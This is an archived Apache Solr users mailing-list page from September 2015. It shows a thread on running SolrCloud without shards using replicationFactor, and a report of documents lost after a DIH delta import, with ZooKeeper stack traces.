> org.apache.solr.handler.dataimport.DataImporter$1.run(DataImporter.java:461)
> >
> > 9/19/2015, 11:16:43 AM ERROR null SolrCore Previous SolrRequestInfo was
> not
> > closed!
> > req=waitSearcher=true=
> http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false
> > 9/19/2015,
> > 11:16:43 AM ERROR null SolrCore prev == info : false
> >
> >
> >
> > Thanks
> >
> > Ravi Kiran Bhaskar
>


SolrCloud DIH issue

2015-09-19 Thread Ravi Solr
I am facing a weird problem. As part of an upgrade from 4.7.2 (Master-Slave)
to 5.3.0 (SolrCloud) I re-indexed 1.5 million records via DIH using
SolrEntityProcessor yesterday; all of them indexed properly. This morning
I just ran the DIH again with a delta import and I lost all docs... what am I
missing? Did anybody face a similar issue?

Here are the errors in the logs

9/19/2015, 2:41:17 AM ERROR null SolrCore Previous SolrRequestInfo was not
closed!
req=waitSearcher=true=http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false
9/19/2015,
2:41:17 AM ERROR null SolrCore prev == info : false 9/19/2015, 2:41:17 AM
WARN null ZKPropertiesWriter Could not read DIH properties from
/configs/sitesearchcore/dataimport.properties :class
org.apache.zookeeper.KeeperException$NoNodeException

org.apache.zookeeper.KeeperException$NoNodeException: KeeperErrorCode
= NoNode for /configs/sitesearchcore/dataimport.properties
at org.apache.zookeeper.KeeperException.create(KeeperException.java:111)
at org.apache.zookeeper.KeeperException.create(KeeperException.java:51)
at org.apache.zookeeper.ZooKeeper.getData(ZooKeeper.java:1155)
at 
org.apache.solr.common.cloud.SolrZkClient.getData(SolrZkClient.java:349)
at 
org.apache.solr.handler.dataimport.ZKPropertiesWriter.readIndexerProperties(ZKPropertiesWriter.java:91)
at 
org.apache.solr.handler.dataimport.ZKPropertiesWriter.persist(ZKPropertiesWriter.java:65)
at 
org.apache.solr.handler.dataimport.DocBuilder.finish(DocBuilder.java:307)
at 
org.apache.solr.handler.dataimport.DocBuilder.execute(DocBuilder.java:253)
at 
org.apache.solr.handler.dataimport.DataImporter.doFullImport(DataImporter.java:416)
at 
org.apache.solr.handler.dataimport.DataImporter.runCmd(DataImporter.java:480)
at 
org.apache.solr.handler.dataimport.DataImporter$1.run(DataImporter.java:461)

9/19/2015, 11:16:43 AM ERROR null SolrCore Previous SolrRequestInfo was not
closed!
req=waitSearcher=true=http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false
9/19/2015,
11:16:43 AM ERROR null SolrCore prev == info : false



Thanks

Ravi Kiran Bhaskar


Re: SolrCloud clarification/Question

2015-09-18 Thread Ravi Solr
Thank you very much Sameer, Erick and Upayavira. I got the solr cloud
working !!! Hurray !!

Cheers

Ravi Kiran Bhaskar

On Thu, Sep 17, 2015 at 3:10 AM, Upayavira <u...@odoko.co.uk> wrote:

> and replicationFactor is the number of copies of your data, not the
> number of servers marked 'replica'. So as has been said, if you have one
> leader, and three replicas, your replicationFactor will be 4.
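>
> So for the 4-machine, unsharded setup described here, that would be
> something like (names illustrative):
>
> /admin/collections?action=CREATE&name=test&collection.configName=test&numShards=1&replicationFactor=4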
>
> Upayavira
>
> On Thu, Sep 17, 2015, at 03:29 AM, Erick Erickson wrote:
> > Ravi:
> >
> > Sameer is correct on how to get it done in one go.
> >
> > Don't get too hung up on replicationFactor. You can always
> > ADDREPLICA after the collection is created if you need to.
> >
> > Best,
> > Erick
> >
> >
> > On Wed, Sep 16, 2015 at 12:44 PM, Sameer Maggon
> > <sam...@measuredsearch.com> wrote:
> > > I just gave an example API call, but for your scenario, the
> > > replicationFactor will be 4 (replicationFactor=4). In this way, all 4
> > > machines will have the same copy of the data and you can put an LB in
> front
> > > of those 4 machines.
> > >
> > > On Wed, Sep 16, 2015 at 12:00 PM, Ravi Solr <ravis...@gmail.com>
> wrote:
> > >
> > >> OK...I understood numShards=1, when you say replicationFactor=2 what
> does
> > >> it mean ? I have 4 machines, then, only 3 copies of data (1 at leader
> and 2
> > >> replicas) ?? so am i not under utilizing one machine ?
> > >>
> > >> I was more thinking in the lines of a Mesh connectivity format i.e.
> > >> everybody has others copy so that I can put all 4 machines behind a
> Load
> > >> Balancer...Is that a wrong way to look at it ?
> > >>
> > >> Thanks
> > >>
> > >> Ravi Kiran
> > >>
> > >> On Wed, Sep 16, 2015 at 2:51 PM, Sameer Maggon <
> sam...@measuredsearch.com>
> > >> wrote:
> > >>
> > >> > You'll have to say numShards=1 and replicationFactor=2.
> > >> >
> > >> > http://[hostname]:8983/solr/admin/collections?action=CREATE&name=test&collection.configName=test&numShards=1&replicationFactor=2
> > >> >
> > >> > On Wed, Sep 16, 2015 at 11:23 AM, Ravi Solr <ravis...@gmail.com>
> wrote:
> > >> >
> > >> > > Thank you very much for responding Sameer so numShards=0 and
> > >> > > replicationFactor=4 if I have 4 machines ??
> > >> > >
> > >> > > Thanks
> > >> > >
> > >> > > Ravi Kiran Bhaskar
> > >> > >
> > >> > > On Wed, Sep 16, 2015 at 12:56 PM, Sameer Maggon <
> > >> > sam...@measuredsearch.com
> > >> > > >
> > >> > > wrote:
> > >> > >
> > >> > > > Absolutely. You can have a collection with just replicas and no
> > >> shards
> > >> > > for
> > >> > > > redundancy and have a load balancer in front of it that removes
> the
> > >> > > > dependency on a single node. One of them will assume the role
> of a
> > >> > > leader,
> > >> > > > and in case that leader goes down, one of the replicas will be
> > >> elected
> > >> > > as a
> > >> > > > leader and your application will be fine.
> > >> > > >
> > >> > > > Thanks,
> > >> > > >
> > >> > > > On Wed, Sep 16, 2015 at 9:44 AM, Ravi Solr <ravis...@gmail.com>
> > >> wrote:
> > >> > > >
> > >> > > > > Hello,
> > >> > > > >  We are trying to move away from Master-Slave
> configuration
> > >> > to
> > >> > > a
> > >> > > > > SolrCloud environment. I have a couple of questions.
> Currently in
> > >> the
> > >> > > > > Master-Slave setup we have 4 Machines 2 of which are indexers
> and 2
> > >> > of
> > >> > > > them
> > >> > > > > are query servers. The query servers are fronted via Load
> Balancer.
> > >> > > > >
> > >> > > > > There are 3 solr cores for 3 different/separate applications
> > >> > (mutually
> > >> > > > > exclusive). Each core is a complete index of all docs (i.e.
> the
> > >> data
> > >> > is
> > >> > > > not
> > >> > > > > sharded).
> > >> > > > >
> > >> > > > >   We intend to keep it in a non-sharded mode even after
> the
> > >> > > SolrCloud
> > >> > > > > mode.The prime motivation to move to cloud is to effectively
> use
> > >> all
> > >> > > > > servers for indexing and querying (read fault
> tolerant/redundant).
> > >> > > > >
> > >> > > > > So, the real question is, can SolrCloud be used without
> shards ?
> > >> > i.e. a
> > >> > > > > "collection" resides entirely on one machine rather than
> > >> partitioning
> > >> > > > data
> > >> > > > > onto different machines ?
> > >> > > > >
> > >> > > > > Thanks
> > >> > > > >
> > >> > > > > Ravi Kiran Bhaskar
> > >> > > > >
> > >> > > >
> > >> > > >
> > >> > > >
> > >> > > > --
> > >> > > > *Sameer Maggon*
> > >> > > > Measured Search
> > >> > > > c: 310.344.7266
> > >> > > > www.measuredsearch.com <http://measuredsearch.com>
> > >> > > >
> > >> > >
> > >> >
> > >> >
> > >> >
> > >> > --
> > >> > *Sameer Maggon*
> > >> > Measured Search
> > >> > c: 310.344.7266
> > >> > www.measuredsearch.com <http://measuredsearch.com>
> > >> >
> > >>
> > >
> > >
> > >
> > > --
> > > *Sameer Maggon*
> > > Measured Search
> > > c: 310.344.7266
> > > www.measuredsearch.com <http://measuredsearch.com>
>


SolrCloud clarification/Question

2015-09-16 Thread Ravi Solr
Hello,
 We are trying to move away from Master-Slave configuration to a
SolrCloud environment. I have a couple of questions. Currently in the
Master-Slave setup we have 4 Machines 2 of which are indexers and 2 of them
are query servers. The query servers are fronted via Load Balancer.

There are 3 solr cores for 3 different/separate applications (mutually
exclusive). Each core is a complete index of all docs (i.e. the data is not
sharded).

  We intend to keep it in a non-sharded mode even after the SolrCloud
mode. The prime motivation to move to cloud is to effectively use all
servers for indexing and querying (read fault tolerant/redundant).

So, the real question is, can SolrCloud be used without shards ? i.e. a
"collection" resides entirely on one machine rather than partitioning data
onto different machines ?

Thanks

Ravi Kiran Bhaskar


Re: SolrCloud clarification/Question

2015-09-16 Thread Ravi Solr
OK... I understood numShards=1; when you say replicationFactor=2, what does
it mean? I have 4 machines, then only 3 copies of data (1 at the leader and 2
replicas)?? So am I not underutilizing one machine?

I was thinking more along the lines of a mesh connectivity format, i.e.
everybody has the others' copy, so that I can put all 4 machines behind a Load
Balancer... Is that a wrong way to look at it?

Thanks

Ravi Kiran

On Wed, Sep 16, 2015 at 2:51 PM, Sameer Maggon <sam...@measuredsearch.com>
wrote:

> You'll have to say numShards=1 and replicationFactor=2.
>
> http://[hostname]:8983/solr/admin/collections?action=CREATE&name=test&collection.configName=test&numShards=1&replicationFactor=2
>
> On Wed, Sep 16, 2015 at 11:23 AM, Ravi Solr <ravis...@gmail.com> wrote:
>
> > Thank you very much for responding Sameer, so numShards=0 and
> > replicationFactor=4 if I have 4 machines ??
> >
> > Thanks
> >
> > Ravi Kiran Bhaskar
> >
> > On Wed, Sep 16, 2015 at 12:56 PM, Sameer Maggon <
> sam...@measuredsearch.com
> > >
> > wrote:
> >
> > > Absolutely. You can have a collection with just replicas and no shards
> > for
> > > redundancy and have a load balancer in front of it that removes the
> > > dependency on a single node. One of them will assume the role of a
> > leader,
> > > and in case that leader goes down, one of the replicas will be elected
> > as a
> > > leader and your application will be fine.
> > >
> > > Thanks,
> > >
> > > On Wed, Sep 16, 2015 at 9:44 AM, Ravi Solr <ravis...@gmail.com> wrote:
> > >
> > > > Hello,
> > > >  We are trying to move away from Master-Slave configuration
> to
> > a
> > > > SolrCloud environment. I have a couple of questions. Currently in the
> > > > Master-Slave setup we have 4 Machines 2 of which are indexers and 2
> of
> > > them
> > > > are query servers. The query servers are fronted via Load Balancer.
> > > >
> > > > There are 3 solr cores for 3 different/separate applications
> (mutually
> > > > exclusive). Each core is a complete index of all docs (i.e. the data
> is
> > > not
> > > > sharded).
> > > >
> > > >   We intend to keep it in a non-sharded mode even after the
> > SolrCloud
> > > > mode.The prime motivation to move to cloud is to effectively use all
> > > > servers for indexing and querying (read fault tolerant/redundant).
> > > >
> > > > So, the real question is, can SolrCloud be used without shards ?
> i.e. a
> > > > "collection" resides entirely on one machine rather than partitioning
> > > data
> > > > onto different machines ?
> > > >
> > > > Thanks
> > > >
> > > > Ravi Kiran Bhaskar
> > > >
> > >
> > >
> > >
> > > --
> > > *Sameer Maggon*
> > > Measured Search
> > > c: 310.344.7266
> > > www.measuredsearch.com <http://measuredsearch.com>
> > >
> >
>
>
>
> --
> *Sameer Maggon*
> Measured Search
> c: 310.344.7266
> www.measuredsearch.com <http://measuredsearch.com>
>

